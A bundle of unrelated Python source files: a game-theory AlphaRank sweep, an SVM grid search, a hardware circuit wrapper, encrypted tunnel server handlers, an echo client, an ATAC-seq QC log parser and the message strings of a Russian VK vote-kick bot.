atol=1e-8):
"""Computes stationary distribution, pi, for range of selection intensities.
The range of selection intensities is defined in alpha_list and corresponds
to the temperature of the Fermi selection function.
Args:
payoff_tables: List of game payoff tables, one for each agent identity. Each
payoff_table may be either a numpy array, or a _PayoffTableInterface
object.
strat_labels: Human-readable strategy labels. See get_strat_profile_labels()
in utils.py for formatting details.
warm_start_alpha: Initial value of alpha to use.
visualize: Plot the sweep results.
return_alpha: Whether to return the final alpha used.
m: AlphaRank population size.
rtol: The relative tolerance parameter for np.allclose calls.
atol: The absolute tolerance parameter for np.allclose calls.
Returns:
pi: AlphaRank stationary distribution.
alpha: The AlphaRank selection-intensity level resulting from sweep.
"""
payoffs_are_hpt_format = utils.check_payoffs_are_hpt(payoff_tables)
num_populations = len(payoff_tables)
num_strats_per_population =\
utils.get_num_strats_per_population(payoff_tables, payoffs_are_hpt_format)
if num_populations == 1:
num_profiles = num_strats_per_population[0]
else:
num_profiles = utils.get_num_profiles(num_strats_per_population)
assert strat_labels is None or isinstance(strat_labels, dict)\
or (len(strat_labels) == num_profiles)
pi_list = np.empty((num_profiles, 0))
alpha_list = []
num_iters = 0
alpha_mult_factor = 2.
if warm_start_alpha is not None:
alpha = warm_start_alpha
alpharank_succeeded_once = False
else:
alpha = 1e-4 # Reasonable default for most games, can be user-overridden
while 1:
try:
_, _, pi, _, _ = compute(payoff_tables, alpha=alpha, m=m)
pi_list = np.append(pi_list, np.reshape(pi, (-1, 1)), axis=1)
alpha_list.append(alpha)
# Stop when pi converges
if num_iters > 0 and np.allclose(pi, pi_list[:, num_iters - 1], rtol,
atol):
break
alpha *= alpha_mult_factor
num_iters += 1
alpharank_succeeded_once = True
except ValueError as _:
if warm_start_alpha is not None and not alpharank_succeeded_once:
# When warm_start_alpha is used, there's a chance that
# the initial warm_start_alpha is too large and causes exceptions due to
# the Markov transition matrix being reducible. So keep decreasing until
# a single success occurs.
alpha /= 2
elif not np.allclose(pi_list[:, -1], pi_list[:, -2], rtol, atol):
# Sweep stopped due to multiple stationary distributions, but pi had
# not converged due to the alpha scaling being too large.
alpha /= alpha_mult_factor
alpha_mult_factor = (alpha_mult_factor + 1.) / 2.
alpha *= alpha_mult_factor
else:
break
if strat_labels is None:
strat_labels = utils.get_strat_profile_labels(payoff_tables,
payoffs_are_hpt_format)
fig = plot_pi_vs_alpha(
pi_list.T,
alpha_list,
num_populations,
num_strats_per_population,
strat_labels,
num_strats_to_label=10)
return pi, alpha, fig
def compute_and_report_alpharank(payoff_tables,
m=50,
alpha=100,
verbose=False,
num_top_strats_to_print=8):
"""Computes and visualizes Alpha-Rank outputs.
Args:
payoff_tables: List of game payoff tables, one for each agent identity. Each
payoff_table may be either a numpy array, or a _PayoffTableInterface
object.
m: Finite population size.
alpha: Fermi distribution temperature parameter.
verbose: Set to True to print intermediate results.
num_top_strats_to_print: Number of top strategies to print.
Returns:
pi: AlphaRank stationary distribution/rankings.
"""
payoffs_are_hpt_format = utils.check_payoffs_are_hpt(payoff_tables)
rhos, rho_m, pi, _, _ = compute(payoff_tables, m=m, alpha=alpha)
strat_labels = utils.get_strat_profile_labels(payoff_tables,
payoffs_are_hpt_format)
if verbose:
print_results(payoff_tables, payoffs_are_hpt_format, pi=pi)
utils.print_rankings_table(
payoff_tables,
pi,
strat_labels,
num_top_strats_to_print=num_top_strats_to_print)
m_network_plotter = NetworkPlot(
payoff_tables, rhos, rho_m, pi, strat_labels, num_top_profiles=8)
m_network_plotter.compute_and_draw_network()
return pi
|
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import ShuffleSplit
from sklearn.svm import SVC
from sklearn import svm,datasets
from sklearn.model_selection import GridSearchCV
def chooseBestParams(dataset,label):
parameters={'kernel':('rbf','linear'),'C':[1,5,7]}
svr=svm.SVC()
clf=GridSearchCV(svr,parameters)
clf.fit(dataset,label)
print("网格搜索最优参数:",clf.best_estimator_)
return clf.best_estimator_
def svmScore(dataset,label,train_dat,train_tag):
clf=chooseBestParams(dataset=dataset,label=label)
clf.fit(train_dat,train_tag)
pre=clf.predict(dataset)
ans=pre[pre==label]
ans=(ans.shape[0]/label.shape[0])
return ans
# svmScore(iris.data,iris.target,iris.data,iris.target)
|
from magma import *
IOBUF = DeclareCircuit("IOBUF", "T", In(Bit),
"I", In(Bit),
"IO", InOut(Bit),
"O", Out(Bit))
def IOB(**params):
iob = IOBUF(**params)
args = ["T", iob.T, "I", iob.I, "IO", iob.IO, "O", iob.O]
return AnonymousCircuit(args)
|
#!/usr/bin/env python3
import pywind.evtframework.handlers.udp_handler as udp_handler
import pywind.evtframework.handlers.tcp_handler as tcp_handler
import socket, time
import freenet.lib.base_proto.utils as proto_utils
import freenet.lib.logging as logging
class tcp_tunnel(tcp_handler.tcp_handler):
__crypto = None
__crypto_configs = None
__conn_timeout = None
def init_func(self, creator, address, crypto, crypto_configs, conn_timeout=800, is_ipv6=False):
self.__crypto_configs = crypto_configs
self.__crypto = crypto
self.__conn_timeout = conn_timeout
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_STREAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.set_socket(s)
self.bind(address)
self.listen(10)
self.register(self.fileno)
self.add_evt_read(self.fileno)
return self.fileno
def tcp_accept(self):
while 1:
try:
cs, address = self.accept()
self.create_handler(
self.fileno, _tcp_tunnel_handler, self.__crypto,
self.__crypto_configs, cs, address, self.__conn_timeout
)
except BlockingIOError:
break
''''''
return
def tcp_delete(self):
self.unregister(self.fileno)
self.close()
class _tcp_tunnel_handler(tcp_handler.tcp_handler):
__encrypt = None
__decrypt = None
__address = None
__update_time = 0
__conn_timeout = 0
__LOOP_TIMEOUT = 10
def init_func(self, creator, crypto, crypto_configs, cs, address, conn_timeout):
self.__address = address
self.__conn_timeout = conn_timeout
self.__update_time = time.time()
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
self.set_socket(cs)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.__encrypt = crypto.encrypt()
self.__decrypt = crypto.decrypt()
self.__encrypt.config(crypto_configs)
self.__decrypt.config(crypto_configs)
logging.print_general("tcp_connect", address)
return self.fileno
def tcp_readable(self):
rdata = self.reader.read()
self.__decrypt.input(rdata)
while self.__decrypt.can_continue_parse():
try:
self.__decrypt.parse()
except proto_utils.ProtoError:
self.delete_handler(self.fileno)
return
while 1:
pkt_info = self.__decrypt.get_pkt()
if not pkt_info: break
session_id, action, message = pkt_info
self.dispatcher.handle_msg_from_tunnel(self.fileno, session_id, self.__address, action, message)
''''''
return
def tcp_writable(self):
self.remove_evt_write(self.fileno)
def tcp_error(self):
self.delete_handler(self.fileno)
def tcp_timeout(self):
t = time.time()
if t - self.__update_time > self.__conn_timeout:
self.delete_handler(self.fileno)
return
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
def tcp_delete(self):
self.unregister(self.fileno)
self.close()
logging.print_general("tcp_disconnect", self.__address)
def send_msg(self, session_id, address, action, message):
sent_pkt = self.__encrypt.build_packet(session_id, action, message)
self.writer.write(sent_pkt)
self.add_evt_write(self.fileno)
self.__encrypt.reset()
self.__update_time = time.time()
class udp_tunnel(udp_handler.udp_handler):
def init_func(self, creator, address, crypto, crypto_configs, is_ipv6=False):
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_DGRAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
self.set_socket(s)
self.bind(address)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.__encrypt = crypto.encrypt()
self.__decrypt = crypto.decrypt()
self.__encrypt.config(crypto_configs)
self.__decrypt.config(crypto_configs)
return self.fileno
def udp_readable(self, message, address):
result = self.__decrypt.parse(message)
if not result: return
session_id, action, byte_data = result
self.dispatcher.handle_msg_from_tunnel(self.fileno, session_id, address, action, byte_data)
def udp_writable(self):
self.remove_evt_write(self.fileno)
def udp_error(self):
self.delete_handler(self.fileno)
def udp_timeout(self):
pass
def udp_delete(self):
self.unregister(self.fileno)
self.close()
def send_msg(self, session_id, address, action, message):
ippkts = self.__encrypt.build_packets(session_id, action, message)
self.__encrypt.reset()
for ippkt in ippkts: self.sendto(ippkt, address)
self.add_evt_write(self.fileno)
|
import asyncio
import virtualreality.util.utilz as u
addrs = ("127.0.0.1", 6969)
myTasks = []
async def tcp_echo_client(message, loop):
reader, writer = await asyncio.open_connection(*addrs, loop=loop)
# print('Send: %r' % message)
writer.write(u.format_str_for_write("nut"))
data = await u.read(reader)
print("Received: %r" % data)
print("Close the socket")
writer.write(u.format_str_for_write("CLOSE"))
writer.close()
message = "Hello World!\n"
loop = asyncio.get_event_loop()
loop.run_until_complete(tcp_echo_client(message, loop))
loop.close()
|
"""
Adapted from https://github.com/ENCODE-DCC/atac-seq-pipeline/blob/master/src/encode_lib_log_parser.py
"""
from collections import OrderedDict
from statistics import median
import json
import os
def to_int(var):
try:
return int(var)
except ValueError:
return None
def to_float(var):
try:
return float(var)
except ValueError:
return None
def to_bool(var):
return var.lower() in set(['true', 't', 'ok', 'yes', '1'])
def parse_barcode_matching_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["barcode_matching_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
words = f.readline().rstrip('\n').split(' ')
passing, total = words[0].split('/')
result['num_reads_matched'] = to_int(passing)
result['num_reads_total'] = to_int(total)
result['frac_reads_matched'] = result['num_reads_matched'] / result['num_reads_total']
next(f)
next(f)
for line in f:
k, v = line.rstrip('\n').split()
if k == "0":
result['num_match_dist_0'] = to_int(v)
if k == "1":
result['num_match_dist_1'] = to_int(v)
return result
def parse_adapter_trimming_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["adapter_trimming_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
for line in f:
entries = line.rstrip('\n').split(':')
if entries[0] == 'reads with adapter trimmed':
result['num_reads_trimmed'] = to_int(entries[1].strip())
return result
def parse_barcode_revcomp_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
result['barcode_reverse_complement'] = False
return result
result["barcode_revcomp_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
for line in f:
k, v = line.rstrip('\n').split(':')
if k == 'Reverse-complement chosen':
result['barcode_reverse_complement'] = to_bool(v.strip())
return result
def parse_bwt2_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["_bwt2_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
a = next(f)
result["_bwt2_num_reads"] = to_int(a.split(" ")[0]) * 2
next(f)
b = next(f)
result["_bwt2_num_unaligned"] = to_int(b.lstrip().split(" ")[0]) * 2
c = next(f)
result["_bwt2_num_single"] = to_int(c.lstrip().split(" ")[0]) * 2
d = next(f)
result["_bwt2_num_multi"] = to_int(d.lstrip().split(" ")[0]) * 2
return result
def parse_frac_mito_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["mito_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
h = f.readline().rstrip('\n').split('\t')
mito_ind = h.index('Mitochondrial')
non_mito_ind = h.index('Non-Mitochondrial')
for line in f:
entries = line.rstrip('\n').split('\t')
result['mito_reads'] = to_int(entries[mito_ind])
result['non_mito_reads'] = to_int(entries[non_mito_ind])
result['frac_mito_reads'] = result['mito_reads'] / (result['mito_reads'] + result['non_mito_reads'])
return result
def parse_flagstat_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["samstats"] = {"path": os.path.abspath(txt)}
total = ''
total_qc_failed = ''
duplicates = ''
duplicates_qc_failed = ''
mapped = ''
mapped_qc_failed = ''
mapped_pct = ''
paired = ''
paired_qc_failed = ''
read1 = ''
read1_qc_failed = ''
read2 = ''
read2_qc_failed = ''
paired_properly = ''
paired_properly_qc_failed = ''
paired_properly_pct = ''
with_itself = ''
with_itself_qc_failed = ''
singletons = ''
singletons_qc_failed = ''
singletons_pct = ''
diff_chroms = ''
diff_chroms_qc_failed = ''
delimiter_pass_fail = ' + '
with open(txt, 'r') as f:
for line in f:
if ' total ' in line:
if ' in total ' in line:
tmp1 = line.split(' in total ')
else:
tmp1 = line.split(' total ')
line1 = tmp1[0]
tmp1 = line1.split(delimiter_pass_fail)
total = tmp1[0]
total_qc_failed = tmp1[1]
if ' duplicates' in line:
tmp2 = line.split(' duplicates')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
duplicates = tmp2[0]
duplicates_qc_failed = tmp2[1]
if ' mapped (' in line:
tmp3 = line.split(' mapped (')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
mapped = tmp3_1[0]
mapped_qc_failed = tmp3_1[1]
line3_2 = tmp3[1]
tmp3_2 = line3_2.split(':')
mapped_pct = tmp3_2[0] # .replace('%','')
if ' paired in sequencing' in line:
tmp2 = line.split(' paired in sequencing')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
paired = tmp2[0]
paired_qc_failed = tmp2[1]
if ' read1' in line:
tmp2 = line.split(' read1')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
read1 = tmp2[0]
read1_qc_failed = tmp2[1]
if ' read2' in line:
tmp2 = line.split(' read2')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
read2 = tmp2[0]
read2_qc_failed = tmp2[1]
if ' properly paired (' in line:
tmp3 = line.split(' properly paired (')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
paired_properly = tmp3_1[0]
paired_properly_qc_failed = tmp3_1[1]
line3_2 = tmp3[1]
tmp3_2 = line3_2.split(':')
paired_properly_pct = tmp3_2[0] # .replace('%','')
if ' with itself and mate mapped' in line:
tmp3 = line.split(' with itself and mate mapped')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
with_itself = tmp3_1[0]
with_itself_qc_failed = tmp3_1[1]
if ' singletons (' in line:
tmp3 = line.split(' singletons (')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
singletons = tmp3_1[0]
singletons_qc_failed = tmp3_1[1]
line3_2 = tmp3[1]
tmp3_2 = line3_2.split(':')
singletons_pct = tmp3_2[0] # .replace('%','')
if ' with mate mapped to a different chr' in line:
tmp3 = line.split(' with mate mapped to a different chr')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
diff_chroms = tmp3_1[0]
diff_chroms_qc_failed = tmp3_1[1]
if total:
result['total_reads'] = int(total)
if total_qc_failed:
result['total_reads_qc_failed'] = int(total_qc_failed)
if duplicates:
result['duplicate_reads'] = int(duplicates)
if duplicates_qc_failed:
result['duplicate_reads_qc_failed'] = int(duplicates_qc_failed)
if mapped:
result['mapped_reads'] = int(mapped)
if mapped_qc_failed:
result['mapped_reads_qc_failed'] = int(mapped_qc_failed)
if mapped_pct:
if 'nan' not in mapped_pct and 'N/A' not in mapped_pct \
and 'NA' not in mapped_pct:
if '%' in mapped_pct:
mapped_pct = mapped_pct.replace('%', '')
result['frac_mapped_reads'] = float(mapped_pct) / 100.
else:
result['frac_mapped_reads'] = float(mapped_pct)
else:
result['frac_mapped_reads'] = 0.0
if paired:
result['paired_reads'] = int(paired)
if paired_qc_failed:
result['paired_reads_qc_failed'] = int(paired_qc_failed)
if read1:
result['read1'] = int(read1)
if read1_qc_failed:
result['read1_qc_failed'] = int(read1_qc_failed)
if read2:
result['read2'] = int(read2)
if read2_qc_failed:
result['read2_qc_failed'] = int(read2_qc_failed)
if paired_properly:
result['properly_paired_reads'] = int(paired_properly)
if paired_properly_qc_failed:
result['properly_paired_reads_qc_failed'] = int(
paired_properly_qc_failed)
if paired_properly_pct:
if 'nan' not in paired_properly_pct and \
'N/A' not in paired_properly_pct \
and 'NA' not in paired_properly_pct:
if '%' in paired_properly_pct:
paired_properly_pct = paired_properly_pct.replace('%', '')
result['frac_properly_paired_reads'] = float(paired_properly_pct) / 100.
else:
result['frac_properly_paired_reads'] = float(paired_properly_pct)
else:
result['frac_properly_paired_reads'] = 0.0
if with_itself:
result['with_itself'] = int(with_itself)
if with_itself_qc_failed:
result['with_itself_qc_failed'] = int(with_itself_qc_failed)
if singletons:
result['singletons'] = int(singletons)
if singletons_qc_failed:
result['singletons_qc_failed'] = int(singletons_qc_failed)
if singletons_pct:
if 'nan' not in singletons_pct and 'N/A' not in singletons_pct \
and 'NA' not in singletons_pct:
if '%' in singletons_pct:
singletons_pct = singletons_pct.replace('%', '')
result['frac_singletons'] = float(singletons_pct) / 1000.
else:
result['frac_singletons'] = float(singletons_pct)
else:
result['frac_singletons'] = 0.0
if diff_chroms:
result['diff_chroms'] = int(diff_chroms)
if diff_chroms_qc_failed:
result['diff_chroms_qc_failed'] = int(diff_chroms_qc_failed)
return result
def parse_dup_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["picard_markdup_stats"] = {"path": os.path.abspath(txt)}
paired_reads = ''
unpaired_reads = ''
unmapped_reads = ''
unpaired_dupes = ''
paired_dupes = ''
paired_opt_dupes = ''
dupes_pct = ''
picard_log_found = False
# picard markdup
with open(txt, 'r') as f:
header = '' # if 'UNPAIRED_READS_EXAMINED' in header
content = ''
for line in f:
if header:
content = line.replace(',', '.')
picard_log_found = True
break
if 'UNPAIRED_READS_EXAMINED' in line:
header = line
if picard_log_found:
header_items = header.split('\t')
content_items = content.split('\t')
m = dict(zip(header_items, content_items))
unpaired_reads = m['UNPAIRED_READS_EXAMINED']
paired_reads = m['READ_PAIRS_EXAMINED']
unmapped_reads = m['UNMAPPED_READS']
unpaired_dupes = m['UNPAIRED_READ_DUPLICATES']
paired_dupes = m['READ_PAIR_DUPLICATES']
paired_opt_dupes = m['READ_PAIR_OPTICAL_DUPLICATES']
if 'PERCENT_DUPLICATION' in m:
dupes_pct = m['PERCENT_DUPLICATION']
else:
dupes_pct = '0'
else:
# sambamba markdup
with open(txt, 'r') as f:
for line in f:
if ' end pairs' in line:
tmp1 = line.strip().split(' ')
paired_reads = tmp1[1]
if ' single ends ' in line:
tmp1 = line.strip().split(' ')
unpaired_reads = tmp1[1]
unmapped_reads = tmp1[6]
if 'found ' in line:
tmp1 = line.strip().split(' ')
if paired_reads == '0':
unpaired_dupes = tmp1[1] # SE
paired_dupes = 0
else:
unpaired_dupes = 0
paired_dupes = str(int(tmp1[1])/2) # PE
if paired_reads == '0': # SE
dupes_pct = '{0:.2f}'.format(
float(unpaired_dupes)/float(unpaired_reads))
elif paired_reads:
dupes_pct = '{0:.2f}'.format(
float(paired_dupes)/float(paired_reads))
if unpaired_reads:
result['unpaired_reads'] = int(unpaired_reads)
if paired_reads:
result['paired_reads'] = int(paired_reads)
if unmapped_reads:
result['unmapped_reads'] = int(unmapped_reads)
if unpaired_dupes:
result['unpaired_duplicate_reads'] = int(unpaired_dupes)
if paired_dupes:
result['paired_duplicate_reads'] = int(paired_dupes)
if paired_opt_dupes:
result['paired_optical_duplicate_reads'] = int(paired_opt_dupes)
if dupes_pct:
result['frac_duplicate_reads'] = float(dupes_pct)
return result
def parse_lib_complexity_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["pbc_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
next(f)
arr = f.readline().strip().split('\t')
result['total_fragments'] = to_int(arr[0])
result['distinct_fragments'] = to_int(arr[1])
result['positions_with_one_read'] = to_int(arr[2])
result['positions_with_two_reads'] = to_int(arr[3])
result['NRF'] = to_float(arr[4])
result['PBC1'] = to_float(arr[5])
result['PBC2'] = to_float(arr[6])
return result
def m_splice(line, prefix, suffix):
if line.startswith(prefix) and line.endswith(suffix):
return line.removeprefix(prefix).removesuffix(suffix)
return None
def multiplet_detection_qc(txt, ps, pe, bs, mt):
result = OrderedDict()
if os.path.getsize(ps) > 0:
result['barcode_pairs_multiplets'] = {"path": os.path.abspath(ps)}
if os.path.getsize(pe) > 0:
result['barcode_pairs_expanded'] = {"path": os.path.abspath(pe)}
if os.path.getsize(bs) > 0:
result['barcodes_status'] = {"path": os.path.abspath(bs)}
if os.path.getsize(mt) > 0:
result['multiplet_threshold_plot'] = {"path": os.path.abspath(mt)}
if os.path.getsize(txt) > 0:
result['multiplet_stats'] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
for l in f:
line = l.split('-')[-1].lstrip(' ').rstrip('\n')
n = m_splice(line, 'Original run had ', ' total cell barcodes')
if n is not None:
result['original_barcode_count'] = to_int(n)
n = m_splice(line, 'Identified ', ' total barcodes for multiplet detection')
if n is not None:
result['analyzed_barcode_count'] = to_int(n)
n = m_splice(line, 'Identified ', ' barcodes belonging to multiplets')
if n is not None:
result['multiplet_barcode_count'] = to_int(n)
n = m_splice(line, 'After multiplet exclusions, have ', ' total cell barcodes')
if n is not None:
result['final_barcode_count'] = to_int(n)
n = m_splice(line, 'Setting multiplet threshold as ', ' for minimum pairwise Jaccard distance')
if n is not None:
result['multiplet_threshold'] = to_float(n)
result['frac_multiplets'] = result['multiplet_barcode_count'] / result['analyzed_barcode_count']
return result
def parse_archr_qc(dt, df, fs, pf, tu):
result = OrderedDict()
if os.path.getsize(dt) > 0:
result["archr_doublet_summary_text"] = {"path": os.path.abspath(dt)}
if os.path.getsize(df) > 0:
result["archr_doublet_summary_figure"] = {"path": os.path.abspath(df)}
if os.path.getsize(fs) > 0:
result["archr_fragment_size_distribution"] = {"path": os.path.abspath(fs)}
if os.path.getsize(pf) > 0:
result["archr_pre_filter_metadata"] = {"path": os.path.abspath(pf)}
with open(pf, 'r') as f:
cols = f.readline().rstrip('\n').split('\t')
frg_ind = cols.index('nFrags')
enr_ind = cols.index('TSSEnrichment')
frgs = []
enrs = []
for line in f:
entries = line.rstrip('\n').split('\t')
frg = to_int(entries[frg_ind])
enr = to_float(entries[enr_ind])
if enr >= 4:
frgs.append(frg)
enrs.append(enr)
result["_num_barcodes_considered"] = len(frgs)
result["median_fragment_count"] = median(frgs)
result["median_tss_enrichment"] = median(enrs)
if os.path.getsize(tu) > 0:
result["archr_tss_by_unique_frags"] = {"path": os.path.abspath(tu)}
return result
def parse_counts_summary_qc(rd, ar, af, lc, nl, an):
result = OrderedDict()
with open(rd, 'r') as f:
d = json.load(f)
has_nrt = False
has_nrm = False
if 'num_reads_total' in d:
has_nrt = True
result['reads_original'] = d['num_reads_total'] * 2
if 'num_reads_matched' in d:
has_nrm = True
result['reads_barcode_matched'] = d['num_reads_matched'] * 2
if has_nrt and has_nrm:
result['_frac_reads_barcode_matched'] = d['num_reads_matched'] * 2 / result['reads_original']
with open(ar, 'r') as f:
d = json.load(f)
result['reads_mapped'] = d['mapped_reads']
result['_frac_reads_mapped'] = d['mapped_reads'] / d['_bwt2_num_reads']
with open(af, 'r') as f:
d = json.load(f)
result['reads_non_mito'] = d['non_mito_reads']
result['_frac_reads_non_mito'] = d['non_mito_reads'] / result['reads_mapped']
with open(lc, 'r') as f:
d = json.load(f)
result['reads_primary_align'] = d['paired_reads'] * 2
result['_frac_reads_primary_align'] = d['paired_reads'] * 2 / result['reads_non_mito']
with open(af, 'r') as f:
d = json.load(f)
result['reads_nodup'] = d['mapped_reads']
result['_frac_reads_nodup'] = d['mapped_reads'] / result['reads_primary_align']
with open(nl, 'r') as f:
d = json.load(f)
result['barcodes_fragments'] = d['original_barcode_count']
result['barcodes_non_multiplet'] = d['final_barcode_count']
result['_frac_barcodes_non_multiplet'] = d['final_barcode_count'] / result['barcodes_fragments']
with open(an, 'r') as f:
d = json.load(f)
result['barcodes_archr'] = d['_num_barcodes_considered']
result['_frac_barcodes_archr'] = d['_num_barcodes_considered'] / result['barcodes_fragments']
return result
def build_quality_metric_header(sample_data, sample_name, config, data_paths, out_path):
lab = config["dcc_lab"]
experiment = sample_data["experiment"]
replicate = sample_data["replicate_num"]
modality = sample_data["modality"]
data_aliases = [f"{lab}:{experiment}${replicate}${os.path.basename(p)}" for p in data_paths]
alias = f"{lab}:{experiment}${replicate}${os.path.basename(out_path)}"
h = OrderedDict({
"_sample": sample_name,
"_modality": modality,
"lab": lab,
"award": config["dcc_award"],
"quality_metric_of": data_aliases,
"aliases": [alias],
# "step_run": step_run
})
return h
def write_json(data, out_path):
with open(out_path, "w") as f:
json.dump(data, f, indent=4)
try:
out_group = snakemake.params['output_group']
sample_data = snakemake.params['sample_data']
sample_name = snakemake.params['sample_name']
config = snakemake.config
if out_group == "fastqs":
read_stats_out = snakemake.output['read_stats']
barcode_matching = snakemake.input['barcode_matching']
adapter_trimming = snakemake.input['adapter_trimming']
barcode_revcomp = snakemake.input['barcode_revcomp']
data_paths = [snakemake.input['data_file']]
m = parse_barcode_matching_qc(barcode_matching)
a = parse_adapter_trimming_qc(adapter_trimming)
r = parse_barcode_revcomp_qc(barcode_revcomp)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, read_stats_out)
read_stats = h | m | a | r
write_json(read_stats, read_stats_out)
elif out_group == "mapping":
alignment_stats_out = snakemake.output['alignment_stats']
samstats_raw = snakemake.input['samstats_raw']
bwt2_stats = snakemake.input['bwt2_stats']
data_paths = [snakemake.input['data_file']]
a = parse_flagstat_qc(samstats_raw)
b = parse_bwt2_qc(bwt2_stats)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, alignment_stats_out)
alignment_stats = h | a | b
write_json(alignment_stats, alignment_stats_out)
elif out_group == "filtering":
alignment_stats_out = snakemake.output['alignment_stats']
lib_comp_stats_out = snakemake.output['lib_comp_stats']
samstats_filtered = snakemake.input['samstats_filtered']
picard_markdup = snakemake.input['picard_markdup']
pbc_stats = snakemake.input['pbc_stats']
frac_mito = snakemake.input['frac_mito']
data_paths = [snakemake.input['data_file']]
s = parse_flagstat_qc(samstats_filtered)
p = parse_dup_qc(picard_markdup)
l = parse_lib_complexity_qc(pbc_stats)
m = parse_frac_mito_qc(frac_mito)
ha = build_quality_metric_header(sample_data, sample_name, config, data_paths, alignment_stats_out)
hl = build_quality_metric_header(sample_data, sample_name, config, data_paths, lib_comp_stats_out)
alignment_stats = ha | s | m
lib_comp_stats = hl | p | l
write_json(alignment_stats, alignment_stats_out)
write_json(lib_comp_stats, lib_comp_stats_out)
elif out_group == "fragments":
fragments_stats_out = snakemake.output['fragments_stats']
multiplet_stats = snakemake.input['multiplet_stats']
barcodes_pairs_strict = snakemake.input['barcode_pairs_strict']
barcodes_pairs_expanded = snakemake.input['barcode_pairs_expanded']
barcodes_status = snakemake.input['barcodes_status']
multiplets_thresh = snakemake.input['multiplets_thresh']
data_paths = [snakemake.input['data_file']]
m = multiplet_detection_qc(
multiplet_stats,
barcodes_pairs_strict,
barcodes_pairs_expanded,
barcodes_status,
multiplets_thresh
)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, fragments_stats_out)
fragments_stats = h | m
write_json(fragments_stats, fragments_stats_out)
elif out_group == "analyses":
analyses_stats_out = snakemake.output['analyses_stats']
archr_doublet_summary_text = snakemake.input['archr_doublet_summary_text']
archr_doublet_summary_figure = snakemake.input['archr_doublet_summary_figure']
archr_fragment_size_distribution = snakemake.input['archr_fragment_size_distribution']
archr_pre_filter_metadata = snakemake.input['archr_pre_filter_metadata']
archr_tss_by_unique_frags = snakemake.input['archr_tss_by_unique_frags']
data_paths = [snakemake.input['data_file']]
f = parse_archr_qc(
archr_doublet_summary_text,
archr_doublet_summary_figure,
archr_fragment_size_distribution,
archr_pre_filter_metadata,
archr_tss_by_unique_frags
)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, analyses_stats_out)
analyses_stats = h | f
write_json(analyses_stats, analyses_stats_out)
elif out_group == "summary":
summary_stats_out = snakemake.output['summary_stats']
read_stats = snakemake.input['read_stats']
alignment_stats_raw = snakemake.input['alignment_stats_raw']
alignment_stats_filtered = snakemake.input['alignment_stats_filtered']
lib_comp_stats = snakemake.input['lib_comp_stats']
fragments_stats = snakemake.input['fragments_stats']
analyses_stats = snakemake.input['analyses_stats']
data_paths = [snakemake.input['data_file']]
s = parse_counts_summary_qc(
read_stats,
alignment_stats_raw,
alignment_stats_filtered,
lib_comp_stats,
fragments_stats,
analyses_stats
)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, summary_stats_out)
summary_stats = h | s
write_json(summary_stats, summary_stats_out)
except NameError:
pass
|
'''
СООБЩЕНИЯ БОТА
VOTEBAN BOT
'''
prefix = '[VOTEBAN] '
# С ФОРМАТИРОВАНИЕМ:
finish_vote = prefix + 'Голосование за кик {0} завершено. Голосов за: {1}, голосов против: {2}.'
start_vote = prefix + 'Кикаем [{0}|{1}]?\nЧтобы проголосовать за - пишите "!да" / "!+" / "!yes". Против - "!нет" / "!-" / "!no"\nГолосование продлится {2} минут(у/ы).\n' \
'Для голосования необходимо набрать {3} голосов'
vote_accepted = prefix + 'Голос принят. Кол-во голосов за кик: {0}. Кол-во голосов против кика: {1}'
help = prefix + '''Вас привествует бот, позволяющий делать голосование за исключение какого-либо пользователя.
Комманды:
- !voteban ID_ПОЛЬЗОВАТЕЛЯ - создать голосование. ID пользователя находится в его ссылке после vk.com/. Голосование длится {0} минут(у/ы). Условия исключения: голосовало более {1} участников беседы, голосов "за" набрано больше, чем "против"
- !votehelp - Помощь по использованию бота
- !banlist - Просмотреть заблокированных в этой беседе пользоваетелей
- !uptime - Время работы бота
- !authors - узнать создателей бота
